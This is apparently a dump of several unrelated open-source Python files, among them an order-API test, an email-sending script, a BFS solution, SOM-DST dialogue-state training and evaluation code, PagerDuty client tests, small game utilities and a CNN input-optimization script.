assert response.json()['error'] == 'VALIDATION_ERROR'
def test_create_order_fails_with_unknown_product(
self, gateway_service, web_session
):
# setup mock products-service response:
gateway_service.products_rpc.list.return_value = [
{
'id': 'the_odyssey',
'title': 'The Odyssey',
'maximum_speed': 3,
'in_stock': 899,
'passenger_capacity': 100
},
{
'id': 'the_enigma',
'title': 'The Enigma',
'maximum_speed': 200,
'in_stock': 1,
'passenger_capacity': 4
},
]
# call the gateway service to create the order
response = web_session.post(
'/orders',
json.dumps({
'order_details': [
{
'product_id': 'unknown',
'price': '41',
'quantity': 1
}
]
})
)
assert response.status_code == 404
assert response.json()['error'] == 'PRODUCT_NOT_FOUND'
assert response.json()['message'] == 'Product Id unknown'
``` |
{
"source": "jjingram/msginabottle",
"score": 3
} |
#### File: jjingram/msginabottle/send.py
```python
import configparser
import smtplib
import imaplib
from email.message import EmailMessage
from email.utils import make_msgid, formatdate
import time
config = configparser.ConfigParser()
config.read('.miabrc')
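# Illustrative .miabrc layout (hypothetical values); the sections and keys below are
# exactly the ones this script reads via config['server'][...] and config['login'][...]:
#
#   [server]
#   hostname = mail.example.com
#   port = 465
#   domain = example.com
#
#   [login]
#   user = alice@example.com
#   password = secret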
def prompt(prompt):
return input(prompt).strip()
fromaddr = config['login']['user']
toaddrs = prompt("To: ").split()
print("Enter message, end with ^D (Unix) or ^Z (Windows):")
msg = EmailMessage()
msg['From'] = fromaddr
msg['To'] = ", ".join(toaddrs)
msg['Message-Id'] = make_msgid(None, config['server']['domain'])
msg['Date'] = formatdate(None, True, False)
msg['Email2Chat-Version'] = '1.0'
body = ''
while True:
try:
line = input()
except EOFError:
break
if not line:
break
body = body + line
msg.set_content(body)
S = None
if config['server']['port'] == '465':
S = smtplib.SMTP_SSL(config['server']['hostname'])
S.set_debuglevel(1)
else:
S = smtplib.SMTP(config['server']['hostname'], config['server']['port'])
S.set_debuglevel(1)
S.starttls()
S.login(config['login']['user'], config['login']['password'])
S.send_message(msg)
S.quit()
M = imaplib.IMAP4_SSL(config['server']['hostname'])
M.debug = 4
M.login(config['login']['user'], config['login']['password'])
M.append('Sent', r'\Seen', imaplib.Time2Internaldate(time.time()), str(msg).encode('utf-8'))
M.logout()
``` |
{
"source": "jjinho/rosalind",
"score": 4
} |
#### File: rosalind/breadth_first_search/main.py
```python
def main():
n = 0 # number of vertices
m = 0 # number of edges
graph = {}
# Parse in.txt
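    # Expected in.txt layout (illustrative values): the first line holds the number of
    # vertices n and edges m, and each of the m remaining lines is a directed edge
    # "v1 v2", e.g.
    #   6 6
    #   4 6
    #   6 5
    #   4 3
    #   3 5
    #   2 1
    #   1 4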
with open('./in.txt') as f:
for i, line in enumerate(f):
if i == 0:
n, m = (int(x) for x in line.split())
else:
v1, v2 = (int(x) for x in line.split())
if not v1 in graph:
graph[v1] = [v2]
else:
graph[v1].append(v2)
# Distance of the nodes from the root (1)
distances = {x:-1 for x in range(1, n+1)}
# Tell us if the node has been visited
visited = {x:False for x in range(1, n+1)}
    # Always start the BFS from vertex 1: the problem asks for distances from
    # vertex 1, even if vertex 1 has no outgoing edges
    root = 1
    distances[root] = 0
    visited[root] = True
    queue = [root]
while queue:
root = queue.pop(0)
if root in graph:
children = graph[root]
for child in children:
if not visited[child]:
visited[child] = True
# This is the key
distances[child] = distances[root] + 1
queue += [child]
for k,v in distances.items():
#print('{0}: {1}'.format(k, v), end=" ")
print(v, end=" ")
print()
if __name__ == '__main__':
main()
``` |
{
"source": "JJinIT/som-dst",
"score": 2
} |
#### File: JJinIT/som-dst/evaluation.py
```python
from utils.data_utils import prepare_dataset, MultiWozDataset
from utils.data_utils import make_slot_meta, domain2id, OP_SET, make_turn_label, postprocessing
from utils.eval_utils import compute_prf, compute_acc, per_domain_join_accuracy
from pytorch_transformers import BertTokenizer, BertConfig
from model import SomDST
import torch.nn as nn
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
import random
import numpy as np
import os
import time
import argparse
import json
from copy import deepcopy
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def main(args):
ontology = json.load(open(os.path.join(args.data_root, args.ontology_data)))
slot_meta, _ = make_slot_meta(ontology)
tokenizer = BertTokenizer(args.vocab_path, do_lower_case=True)
data = prepare_dataset(os.path.join(args.data_root, args.test_data),
tokenizer,
slot_meta, args.n_history, args.max_seq_length, args.op_code)
model_config = BertConfig.from_json_file(args.bert_config_path)
model_config.dropout = 0.1
op2id = OP_SET[args.op_code]
model = SomDST(model_config, len(op2id), len(domain2id), op2id['update'])
ckpt = torch.load(args.model_ckpt_path, map_location='cpu')
model.load_state_dict(ckpt)
model.eval()
model.to(device)
if args.eval_all:
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, False, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, False, True)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, True, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
False, True, True)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, False, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, True, False)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, False, True)
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
True, True, True)
else:
model_evaluation(model, data, tokenizer, slot_meta, 0, args.op_code,
args.gt_op, args.gt_p_state, args.gt_gen)
def model_evaluation(model, test_data, tokenizer, slot_meta, epoch, op_code='4',
is_gt_op=False, is_gt_p_state=False, is_gt_gen=False):
model.eval()
op2id = OP_SET[op_code]
id2op = {v: k for k, v in op2id.items()}
id2domain = {v: k for k, v in domain2id.items()}
slot_turn_acc, joint_acc, slot_F1_pred, slot_F1_count = 0, 0, 0, 0
final_joint_acc, final_count, final_slot_F1_pred, final_slot_F1_count = 0, 0, 0, 0
op_acc, op_F1, op_F1_count = 0, {k: 0 for k in op2id}, {k: 0 for k in op2id}
all_op_F1_count = {k: 0 for k in op2id}
tp_dic = {k: 0 for k in op2id}
fn_dic = {k: 0 for k in op2id}
fp_dic = {k: 0 for k in op2id}
results = {}
last_dialog_state = {}
wall_times = []
for di, i in enumerate(test_data):
if i.turn_id == 0:
last_dialog_state = {}
if is_gt_p_state is False:
i.last_dialog_state = deepcopy(last_dialog_state)
i.make_instance(tokenizer, word_dropout=0.)
else: # ground-truth previous dialogue state
last_dialog_state = deepcopy(i.gold_p_state)
i.last_dialog_state = deepcopy(last_dialog_state)
i.make_instance(tokenizer, word_dropout=0.)
input_ids = torch.LongTensor([i.input_id]).to(device)
input_mask = torch.FloatTensor([i.input_mask]).to(device)
segment_ids = torch.LongTensor([i.segment_id]).to(device)
state_position_ids = torch.LongTensor([i.slot_position]).to(device)
d_gold_op, _, _ = make_turn_label(slot_meta, last_dialog_state, i.gold_state,
tokenizer, op_code, dynamic=True)
gold_op_ids = torch.LongTensor([d_gold_op]).to(device)
start = time.perf_counter()
MAX_LENGTH = 9
with torch.no_grad():
# ground-truth state operation
gold_op_inputs = gold_op_ids if is_gt_op else None
d, s, g = model(input_ids=input_ids,
token_type_ids=segment_ids,
state_positions=state_position_ids,
attention_mask=input_mask,
max_value=MAX_LENGTH,
op_ids=gold_op_inputs)
_, op_ids = s.view(-1, len(op2id)).max(-1)
if g.size(1) > 0:
generated = g.squeeze(0).max(-1)[1].tolist()
else:
generated = []
if is_gt_op:
pred_ops = [id2op[a] for a in gold_op_ids[0].tolist()]
else:
pred_ops = [id2op[a] for a in op_ids.tolist()]
gold_ops = [id2op[a] for a in d_gold_op]
if is_gt_gen:
# ground_truth generation
gold_gen = {'-'.join(ii.split('-')[:2]): ii.split('-')[-1] for ii in i.gold_state}
else:
gold_gen = {}
generated, last_dialog_state = postprocessing(slot_meta, pred_ops, last_dialog_state,
generated, tokenizer, op_code, gold_gen)
end = time.perf_counter()
wall_times.append(end - start)
pred_state = []
for k, v in last_dialog_state.items():
pred_state.append('-'.join([k, v]))
if set(pred_state) == set(i.gold_state):
joint_acc += 1
key = str(i.id) + '_' + str(i.turn_id)
results[key] = [pred_state, i.gold_state]
# Compute prediction slot accuracy
temp_acc = compute_acc(set(i.gold_state), set(pred_state), slot_meta)
slot_turn_acc += temp_acc
# Compute prediction F1 score
temp_f1, temp_r, temp_p, count = compute_prf(i.gold_state, pred_state)
slot_F1_pred += temp_f1
slot_F1_count += count
# Compute operation accuracy
temp_acc = sum([1 if p == g else 0 for p, g in zip(pred_ops, gold_ops)]) / len(pred_ops)
op_acc += temp_acc
if i.is_last_turn:
final_count += 1
if set(pred_state) == set(i.gold_state):
final_joint_acc += 1
final_slot_F1_pred += temp_f1
final_slot_F1_count += count
# Compute operation F1 score
for p, g in zip(pred_ops, gold_ops):
all_op_F1_count[g] += 1
if p == g:
tp_dic[g] += 1
op_F1_count[g] += 1
else:
fn_dic[g] += 1
fp_dic[p] += 1
joint_acc_score = joint_acc / len(test_data)
turn_acc_score = slot_turn_acc / len(test_data)
slot_F1_score = slot_F1_pred / slot_F1_count
op_acc_score = op_acc / len(test_data)
final_joint_acc_score = final_joint_acc / final_count
final_slot_F1_score = final_slot_F1_pred / final_slot_F1_count
latency = np.mean(wall_times) * 1000
op_F1_score = {}
for k in op2id.keys():
tp = tp_dic[k]
fn = fn_dic[k]
fp = fp_dic[k]
precision = tp / (tp+fp) if (tp+fp) != 0 else 0
recall = tp / (tp+fn) if (tp+fn) != 0 else 0
F1 = 2 * precision * recall / float(precision + recall) if (precision + recall) != 0 else 0
op_F1_score[k] = F1
print("------------------------------")
print('op_code: %s, is_gt_op: %s, is_gt_p_state: %s, is_gt_gen: %s' % \
(op_code, str(is_gt_op), str(is_gt_p_state), str(is_gt_gen)))
print("Epoch %d joint accuracy : " % epoch, joint_acc_score)
print("Epoch %d slot turn accuracy : " % epoch, turn_acc_score)
print("Epoch %d slot turn F1: " % epoch, slot_F1_score)
print("Epoch %d op accuracy : " % epoch, op_acc_score)
print("Epoch %d op F1 : " % epoch, op_F1_score)
print("Epoch %d op hit count : " % epoch, op_F1_count)
print("Epoch %d op all count : " % epoch, all_op_F1_count)
print("Final Joint Accuracy : ", final_joint_acc_score)
print("Final slot turn F1 : ", final_slot_F1_score)
print("Latency Per Prediction : %f ms" % latency)
print("-----------------------------\n")
    with open('preds_%d.json' % epoch, 'w') as f:
        json.dump(results, f)
per_domain_join_accuracy(results, slot_meta)
scores = {'epoch': epoch, 'joint_acc': joint_acc_score,
'slot_acc': turn_acc_score, 'slot_f1': slot_F1_score,
'op_acc': op_acc_score, 'op_f1': op_F1_score, 'final_slot_f1': final_slot_F1_score}
return scores
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--data_root", default='data/mwz2.1', type=str)
parser.add_argument("--test_data", default='test_dials.json', type=str)
parser.add_argument("--ontology_data", default='ontology.json', type=str)
parser.add_argument("--vocab_path", default='assets/vocab.txt', type=str)
parser.add_argument("--bert_config_path", default='assets/bert_config_base_uncased.json', type=str)
parser.add_argument("--model_ckpt_path", default='outputs/model_best.bin', type=str)
parser.add_argument("--n_history", default=1, type=int)
parser.add_argument("--max_seq_length", default=256, type=int)
parser.add_argument("--op_code", default="4", type=str)
parser.add_argument("--gt_op", default=False, action='store_true')
parser.add_argument("--gt_p_state", default=False, action='store_true')
parser.add_argument("--gt_gen", default=False, action='store_true')
parser.add_argument("--eval_all", default=False, action='store_true')
args = parser.parse_args()
main(args)
```
#### File: JJinIT/som-dst/train.py
```python
from model import SomDST
from pytorch_transformers import BertTokenizer, AdamW, WarmupLinearSchedule, BertConfig
from utils.data_utils import prepare_dataset, MultiWozDataset
from utils.data_utils import make_slot_meta, domain2id, OP_SET, make_turn_label, postprocessing
from utils.eval_utils import compute_prf, compute_acc, per_domain_join_accuracy
from utils.ckpt_utils import download_ckpt, convert_ckpt_compatible
from evaluation import model_evaluation
import torch
import torch.nn as nn
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
import numpy as np
import argparse
import random
import os
import json
import time
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def masked_cross_entropy_for_value(logits, target, pad_idx=0):
mask = target.ne(pad_idx)
logits_flat = logits.view(-1, logits.size(-1))
log_probs_flat = torch.log(logits_flat)
target_flat = target.view(-1, 1)
losses_flat = -torch.gather(log_probs_flat, dim=1, index=target_flat)
losses = losses_flat.view(*target.size())
losses = losses * mask.float()
loss = losses.sum() / (mask.sum().float())
return loss
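# Shape sketch for masked_cross_entropy_for_value (illustrative sizes): `logits` holds
# the decoder's value-generation distributions, e.g. [batch, max_update, max_value,
# vocab_size], while `target` holds the gold token ids over the same leading
# dimensions, e.g. [batch, max_update, max_value]; positions whose target equals
# pad_idx are excluded from the averaged loss.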
def main(args):
def worker_init_fn(worker_id):
np.random.seed(args.random_seed + worker_id)
n_gpu = 0
if torch.cuda.is_available():
n_gpu = torch.cuda.device_count()
np.random.seed(args.random_seed)
random.seed(args.random_seed)
rng = random.Random(args.random_seed)
torch.manual_seed(args.random_seed)
if n_gpu > 0:
torch.cuda.manual_seed(args.random_seed)
torch.cuda.manual_seed_all(args.random_seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
if not os.path.exists(args.save_dir):
os.mkdir(args.save_dir)
ontology = json.load(open(args.ontology_data))
slot_meta, ontology = make_slot_meta(ontology)
op2id = OP_SET[args.op_code]
print(op2id)
tokenizer = BertTokenizer(args.vocab_path, do_lower_case=True)
train_data_raw = prepare_dataset(data_path=args.train_data_path,
tokenizer=tokenizer,
slot_meta=slot_meta,
n_history=args.n_history,
max_seq_length=args.max_seq_length,
op_code=args.op_code)
train_data = MultiWozDataset(train_data_raw,
tokenizer,
slot_meta,
args.max_seq_length,
rng,
ontology,
args.word_dropout,
args.shuffle_state,
args.shuffle_p)
print("# train examples %d" % len(train_data_raw))
dev_data_raw = prepare_dataset(data_path=args.dev_data_path,
tokenizer=tokenizer,
slot_meta=slot_meta,
n_history=args.n_history,
max_seq_length=args.max_seq_length,
op_code=args.op_code)
print("# dev examples %d" % len(dev_data_raw))
test_data_raw = prepare_dataset(data_path=args.test_data_path,
tokenizer=tokenizer,
slot_meta=slot_meta,
n_history=args.n_history,
max_seq_length=args.max_seq_length,
op_code=args.op_code)
print("# test examples %d" % len(test_data_raw))
model_config = BertConfig.from_json_file(args.bert_config_path)
model_config.dropout = args.dropout
model_config.attention_probs_dropout_prob = args.attention_probs_dropout_prob
model_config.hidden_dropout_prob = args.hidden_dropout_prob
model = SomDST(model_config, len(op2id), len(domain2id), op2id['update'], args.exclude_domain)
if not os.path.exists(args.bert_ckpt_path):
args.bert_ckpt_path = download_ckpt(args.bert_ckpt_path, args.bert_config_path, 'assets')
ckpt = torch.load(args.bert_ckpt_path, map_location='cpu')
model.encoder.bert.load_state_dict(ckpt)
# re-initialize added special tokens ([SLOT], [NULL], [EOS])
model.encoder.bert.embeddings.word_embeddings.weight.data[1].normal_(mean=0.0, std=0.02)
model.encoder.bert.embeddings.word_embeddings.weight.data[2].normal_(mean=0.0, std=0.02)
model.encoder.bert.embeddings.word_embeddings.weight.data[3].normal_(mean=0.0, std=0.02)
model.to(device)
num_train_steps = int(len(train_data_raw) / args.batch_size * args.n_epochs)
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
enc_param_optimizer = list(model.encoder.named_parameters())
enc_optimizer_grouped_parameters = [
{'params': [p for n, p in enc_param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in enc_param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
enc_optimizer = AdamW(enc_optimizer_grouped_parameters, lr=args.enc_lr)
enc_scheduler = WarmupLinearSchedule(enc_optimizer, int(num_train_steps * args.enc_warmup),
t_total=num_train_steps)
dec_param_optimizer = list(model.decoder.parameters())
dec_optimizer = AdamW(dec_param_optimizer, lr=args.dec_lr)
dec_scheduler = WarmupLinearSchedule(dec_optimizer, int(num_train_steps * args.dec_warmup),
t_total=num_train_steps)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
train_sampler = RandomSampler(train_data)
train_dataloader = DataLoader(train_data,
sampler=train_sampler,
batch_size=args.batch_size,
collate_fn=train_data.collate_fn,
num_workers=args.num_workers,
worker_init_fn=worker_init_fn)
loss_fnc = nn.CrossEntropyLoss()
best_score = {'epoch': 0, 'joint_acc': 0, 'op_acc': 0, 'final_slot_f1': 0}
for epoch in range(args.n_epochs):
batch_loss = []
model.train()
for step, batch in enumerate(train_dataloader):
batch = [b.to(device) if not isinstance(b, int) else b for b in batch]
input_ids, input_mask, segment_ids, state_position_ids, op_ids,\
domain_ids, gen_ids, max_value, max_update = batch
if rng.random() < args.decoder_teacher_forcing: # teacher forcing
teacher = gen_ids
else:
teacher = None
domain_scores, state_scores, gen_scores = model(input_ids=input_ids,
token_type_ids=segment_ids,
state_positions=state_position_ids,
attention_mask=input_mask,
max_value=max_value,
op_ids=op_ids,
max_update=max_update,
teacher=teacher)
loss_s = loss_fnc(state_scores.view(-1, len(op2id)), op_ids.view(-1))
loss_g = masked_cross_entropy_for_value(gen_scores.contiguous(),
gen_ids.contiguous(),
tokenizer.vocab['[PAD]'])
loss = loss_s + loss_g
if args.exclude_domain is not True:
loss_d = loss_fnc(domain_scores.view(-1, len(domain2id)), domain_ids.view(-1))
loss = loss + loss_d
batch_loss.append(loss.item())
loss.backward()
enc_optimizer.step()
enc_scheduler.step()
dec_optimizer.step()
dec_scheduler.step()
model.zero_grad()
if step % 100 == 0:
if args.exclude_domain is not True:
print("[%d/%d] [%d/%d] mean_loss : %.3f, state_loss : %.3f, gen_loss : %.3f, dom_loss : %.3f" \
% (epoch+1, args.n_epochs, step,
len(train_dataloader), np.mean(batch_loss),
loss_s.item(), loss_g.item(), loss_d.item()))
else:
print("[%d/%d] [%d/%d] mean_loss : %.3f, state_loss : %.3f, gen_loss : %.3f" \
% (epoch+1, args.n_epochs, step,
len(train_dataloader), np.mean(batch_loss),
loss_s.item(), loss_g.item()))
batch_loss = []
if (epoch+1) % args.eval_epoch == 0:
eval_res = model_evaluation(model, dev_data_raw, tokenizer, slot_meta, epoch+1, args.op_code)
if eval_res['joint_acc'] > best_score['joint_acc']:
best_score = eval_res
model_to_save = model.module if hasattr(model, 'module') else model
save_path = os.path.join(args.save_dir, 'model_best.bin')
torch.save(model_to_save.state_dict(), save_path)
print("Best Score : ", best_score)
print("\n")
print("Test using best model...")
best_epoch = best_score['epoch']
ckpt_path = os.path.join(args.save_dir, 'model_best.bin')
model = SomDST(model_config, len(op2id), len(domain2id), op2id['update'], args.exclude_domain)
ckpt = torch.load(ckpt_path, map_location='cpu')
model.load_state_dict(ckpt)
model.to(device)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=False, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=False, is_gt_gen=True)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=True, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=False, is_gt_p_state=True, is_gt_gen=True)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=False, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=True, is_gt_gen=False)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=False, is_gt_gen=True)
model_evaluation(model, test_data_raw, tokenizer, slot_meta, best_epoch, args.op_code,
is_gt_op=True, is_gt_p_state=True, is_gt_gen=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--data_root", default='data/mwz2.1', type=str)
parser.add_argument("--train_data", default='train_dials.json', type=str)
parser.add_argument("--dev_data", default='dev_dials.json', type=str)
parser.add_argument("--test_data", default='test_dials.json', type=str)
parser.add_argument("--ontology_data", default='ontology.json', type=str)
parser.add_argument("--vocab_path", default='assets/vocab.txt', type=str)
parser.add_argument("--bert_config_path", default='assets/bert_config_base_uncased.json', type=str)
parser.add_argument("--bert_ckpt_path", default='assets/bert-base-uncased-pytorch_model.bin', type=str)
parser.add_argument("--save_dir", default='outputs', type=str)
parser.add_argument("--random_seed", default=42, type=int)
parser.add_argument("--num_workers", default=4, type=int)
parser.add_argument("--batch_size", default=32, type=int)
parser.add_argument("--enc_warmup", default=0.1, type=float)
parser.add_argument("--dec_warmup", default=0.1, type=float)
parser.add_argument("--enc_lr", default=4e-5, type=float)
parser.add_argument("--dec_lr", default=1e-4, type=float)
parser.add_argument("--n_epochs", default=30, type=int)
parser.add_argument("--eval_epoch", default=1, type=int)
parser.add_argument("--op_code", default="4", type=str)
parser.add_argument("--slot_token", default="[SLOT]", type=str)
parser.add_argument("--dropout", default=0.1, type=float)
parser.add_argument("--hidden_dropout_prob", default=0.1, type=float)
parser.add_argument("--attention_probs_dropout_prob", default=0.1, type=float)
parser.add_argument("--decoder_teacher_forcing", default=0.5, type=float)
parser.add_argument("--word_dropout", default=0.1, type=float)
parser.add_argument("--not_shuffle_state", default=False, action='store_true')
parser.add_argument("--shuffle_p", default=0.5, type=float)
parser.add_argument("--n_history", default=1, type=int)
parser.add_argument("--max_seq_length", default=256, type=int)
parser.add_argument("--msg", default=None, type=str)
parser.add_argument("--exclude_domain", default=False, action='store_true')
args = parser.parse_args()
args.train_data_path = os.path.join(args.data_root, args.train_data)
args.dev_data_path = os.path.join(args.data_root, args.dev_data)
args.test_data_path = os.path.join(args.data_root, args.test_data)
args.ontology_data = os.path.join(args.data_root, args.ontology_data)
args.shuffle_state = False if args.not_shuffle_state else True
print('pytorch version: ', torch.__version__)
print(args)
main(args)
``` |
{
"source": "jjinno/pygerduty",
"score": 2
} |
#### File: pygerduty/tests/client_test.py
```python
from __future__ import absolute_import
import httpretty
import pygerduty
import pygerduty.v2
import pytest
###################
# Version 1 Tests #
###################
@httpretty.activate
def test_unknown_subdomain_v1():
httpretty.register_uri(
httpretty.GET, "https://contosso.pagerduty.com/api/v1/users/ABCDEFG",
body='{"error":{"message":"Account Not Found","code":2007}}', status=404)
p = pygerduty.PagerDuty("contosso", "password")
with pytest.raises(pygerduty.NotFound):
p.users.show("ABCDEFG")
###################
# Version 2 Tests #
###################
@httpretty.activate
def test_v2_domain():
httpretty.register_uri(
httpretty.GET, "https://api.pagerduty.com/users/EFGHIJK",
body='{"error": {"message":"API Not found", "code":207}}', status=404)
p = pygerduty.v2.PagerDuty("password")
with pytest.raises(pygerduty.common.NotFound):
p.users.show("EFGHIJK")
``` |
{
"source": "jjinux/pyweek32-neverending",
"score": 3
} |
#### File: pyweek32-neverending/pw32n/enemy_sprites.py
```python
from typing import Any
import arcade
from pw32n import models
class EnemySprite(arcade.Sprite):
def __init__(self, model: models.EnemyModel, *args: Any, **kargs: Any) -> None:
super().__init__(*args, **kargs)
self.model = model
```
#### File: pyweek32-neverending/pw32n/lru_dict.py
```python
from collections import OrderedDict
from typing import TypeVar, Generic
K = TypeVar("K")
V = TypeVar("V")
class LRUDict(Generic[K, V]):
"""This is basically a dict (without the full API) that only remembers a fixed number of things."""
def __init__(self, capacity: int):
self.cache: OrderedDict[K, V] = OrderedDict()
self.capacity = capacity
def get(self, key: K, default: V = None) -> V:
if key not in self.cache:
return default
self.cache.move_to_end(key)
return self.cache[key]
def put(self, key: K, value: V) -> None:
self.cache[key] = value
self.cache.move_to_end(key)
if len(self.cache) > self.capacity:
self.cache.popitem(last=False)
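# Illustrative usage sketch (not part of the original module): with capacity 2,
# inserting a third key evicts the least-recently-used entry.
if __name__ == "__main__":
    cache: LRUDict[str, int] = LRUDict(capacity=2)
    cache.put("a", 1)
    cache.put("b", 2)
    assert cache.get("b") == 2       # touching "b" marks it as recently used
    cache.put("c", 3)                # capacity exceeded, so "a" is evicted
    assert cache.get("a", default=-1) == -1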
```
#### File: pyweek32-neverending/pw32n/timed_workflow.py
```python
from typing import NamedTuple, Callable
from pw32n.units import Secs
Callback = Callable[[Secs], int]
class TimedStep(NamedTuple):
delay: Secs
callback: Callback
class TimedWorkflow:
"""See TimedWorkflowExample in timed_workflow_test.py."""
def __init__(self, name: str, steps: list[TimedStep]) -> None:
self.name = name
self.steps = steps
self.initial_countdown = self.countdown = Secs(0.0)
self._set_next_countdown()
def on_update(self, delta_time: float) -> None:
if not len(self.steps):
raise ValueError(
f"You forgot to cleanup your workflow; you should do that in your last step: {self}"
)
self.countdown -= delta_time
if self.countdown <= 0.0:
step = self.steps.pop(0)
step.callback(-self.countdown)
self._set_next_countdown()
def _set_next_countdown(self) -> None:
if len(self.steps):
self.initial_countdown = self.countdown = self.steps[0].delay
@property
def completion_ratio_for_current_step(self) -> float:
if self.initial_countdown == 0.0:
return 1.0
return (
self.initial_countdown - max(0.0, self.countdown)
) / self.initial_countdown
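# Illustrative usage sketch (hypothetical callbacks; the canonical example lives in
# timed_workflow_test.py): two steps spaced one second apart, driven by a fake game
# loop that calls on_update() with a fixed delta time until the last step has fired.
if __name__ == "__main__":
    def step_one(overshoot: Secs) -> int:
        print(f"step one fired, {overshoot:.3f}s late")
        return 0

    def step_two(overshoot: Secs) -> int:
        print(f"step two fired, {overshoot:.3f}s late")
        return 0

    workflow = TimedWorkflow(
        name="example",
        steps=[TimedStep(Secs(1.0), step_one), TimedStep(Secs(1.0), step_two)],
    )
    while workflow.steps:
        workflow.on_update(1 / 16)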
``` |
{
"source": "J-JinZhang/CNN_Visualization",
"score": 3
} |
#### File: J-JinZhang/CNN_Visualization/Visualization_im_optim.py
```python
import os
import numpy as np
from PIL import Image
import pandas as pd
import torch
import torchvision
from torch import nn
import torch.nn.functional as F
from torch.optim import Adam
from torchvision.utils import save_image
from resnet import resnet34
from inception_net import Froth_Inception
import matplotlib.pyplot as plt
class TransferIm2TargetIndex():
def __init__(self, model):
self.model = model
self.model.eval()
mean = [0.5561, 0.5706, 0.5491]
std = [0.1833, 0.1916, 0.2061]
self.mean = torch.tensor(mean).unsqueeze(1).unsqueeze(1)
self.std = torch.tensor(std).unsqueeze(1).unsqueeze(1)
self.mean_feed = torch.FloatTensor([8.411431353067606, 0.5473817630918659, 23.97601543147942])
self.std_feed = torch.FloatTensor([0.7960769134313461, 0.05987490652171015, 0.7161782274613697])
def understand_feature_patterns(self, tailing, image, name):
image.requires_grad = True
target = torch.FloatTensor([6.0, 0.5, 24.7])
target = (target - self.mean_feed) / self.std_feed
optimizer = Adam([image], lr=5e-2, weight_decay=1e-6)
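        # The network weights stay fixed; Adam instead updates the input image pixels so
        # that the model output (normalised with the feed-grade statistics) approaches the
        # chosen target, and an intermediate image is saved every 100 iterations.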
for i in range(1, 4001):
optimizer.zero_grad()
# Assign create image to a variable to move forward in the model
out = self.model(tailing.unsqueeze(0), image.unsqueeze(0), name)
print(f"Out: {out.data * self.std_feed + self.mean_feed}")
loss = torch.sum((out - target)**2)
loss.backward()
optimizer.step()
if i % 100 == 0:
im_save = image.data * self.std + self.mean
save_image(im_save, 'generated/regress_vis' + '_iter'+str(i)+'.jpg', normalize=True)
if __name__ == '__main__':
if not os.path.exists('generated'):
os.makedirs('generated')
mean_feed = torch.FloatTensor([8.411431353067606, 0.5473817630918659, 23.97601543147942])
std_feed = torch.FloatTensor([0.7960769134313461, 0.05987490652171015, 0.7161782274613697])
mean_tailing = torch.FloatTensor([1.3901876578758057, 0.48554048370970193, 25.40719649345569])
std_tailing = torch.FloatTensor([0.2688268864000507, 0.03469305624144162, 1.0110712690887271])
transforms = torchvision.transforms.Compose([
torchvision.transforms.CenterCrop(300),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(mean=[0.5561, 0.5706, 0.5491],
std=[0.1833, 0.1916, 0.2061])])
cnn_layer = 11
filter_pos = 1
name = '3-20160830095333'
img_pil = Image.open(f'Images/{name}.jpg').convert("RGB")
img_tensor = transforms(img_pil)
tailing = (torch.FloatTensor([1.358, 0.505, 26.042]) - mean_tailing) / std_tailing
model = Froth_Inception()
save_file = './saved_models/XRF_InceptionNet_epoch_300.pth'
#model = XRF_ResNet()
#save_file = "./saved_models/XRF_ResNet_epoch_300.pth"
model.load_state_dict(torch.load(save_file))
    #layer_vis = CNNLayerVisualization(model.features, cnn_layer, filter_pos)  # Froth_Inception takes two inputs; here only its features method is used
#layer_vis.visualise_layer_with_hooks(img_tensor)
regress_vis = TransferIm2TargetIndex(model)
regress_vis.understand_feature_patterns(tailing, img_tensor, name)
``` |
{
"source": "J-JinZhang/SoftSening",
"score": 2
} |
#### File: J-JinZhang/SoftSening/dataset.py
```python
import torch
import torchvision
from torch.utils.data import Dataset
import numpy as np
from PIL import Image
import pandas as pd
import random
import os
class XRFImg4FeedSet(Dataset):
def __init__(self, root, csv_file, train_mode, clip_mode): # csv_file = 'XRFImgData4FeedRegression.csv'
self.clip_mode = clip_mode
self.root = root
self.df=pd.read_csv(csv_file)
tailing = self.df.iloc[:,0:3].values
feed = self.df.iloc[:,4:7].values
clip = self.df.iloc[:,3].values
mean_tailing = [tailing[:,0].mean(), tailing[:,1].mean(), tailing[:,2].mean()]
std_tailing = [tailing[:,0].std(), tailing[:,1].std(), tailing[:,2].std()]
tailing = (tailing - mean_tailing) / std_tailing
mean_feed = [feed[:,0].mean(), feed[:,1].mean(), feed[:,2].mean()]
std_feed = [feed[:,0].std(), feed[:,1].std(), feed[:,2].std()]
#print(f'mean_feed: {mean_feed} std_feed: {std_feed}')
feed = (feed - mean_feed) / std_feed
